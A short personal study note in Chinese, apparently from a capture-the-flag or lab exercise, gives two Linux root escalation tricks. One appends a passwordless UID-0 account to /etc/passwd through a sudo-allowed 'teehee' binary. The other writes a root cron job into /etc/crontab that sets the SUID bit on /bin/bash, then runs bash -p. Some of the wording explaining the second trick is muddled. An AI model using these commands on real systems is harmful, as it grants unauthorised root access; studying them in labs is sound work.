1.修改/etc/passwd
原理: 直接修改/etc/passwd文件,追加一个空密码进入/etc/passwd里
echo "shinyorb::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su shinyorb
2.修改/bin/bash权限
原理:通过日志更改/bin/bash,使其变成4777也就是suid权限,然后/bin/bash -p强制停下,就有root权限了
sudo teehee /etc/crontab
* * * * * root chmod 4777 /bin/bash
/bin/bash -p
东西不多,个人笔记,记录今天的学习成果